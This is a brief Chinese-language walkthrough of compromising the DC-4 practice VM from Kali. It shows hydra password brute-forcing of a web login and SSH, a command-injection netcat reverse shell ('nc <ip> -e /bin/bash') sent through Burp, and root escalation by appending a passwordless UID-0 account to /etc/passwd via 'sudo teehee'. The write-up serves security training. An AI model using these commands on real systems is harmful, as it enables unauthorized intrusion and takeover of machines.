DC4靶机
实验环境
靶机:kali
目标机:DC-4
实验工具:burpsuite
实验步骤
arp-scan -l扫描主机ip地址
nmap扫描开的端口
进行访问80,需要输入密码
hydra -l admin -P /usr/share/wordlists/rockyou.txt x.x.x.161 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F 进行密码爆破
这里注意,如果第一次使用的话可能需要到命令中所存在路径去解压rockyou的压缩包之后即可使用
输入密码打开
看到执行命令,进行burp抓包
看到可控
在burp中输入nc kali的ip地址 -e /bin/bash 进行NC 命令反弹
反弹成功,进入交互式模式
看到home/mail/jim/backups中有密码
复制密码创建jim.txt
进行hydar -l jim -P jim.txt ssh://靶机地址 爆破,并进行ssh远程登录
进入到jim ,进入var
打开查看mbox发现是root用户发来的邮件
有charles用户和密码
登录charles用户
输入echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd 进行提权,成功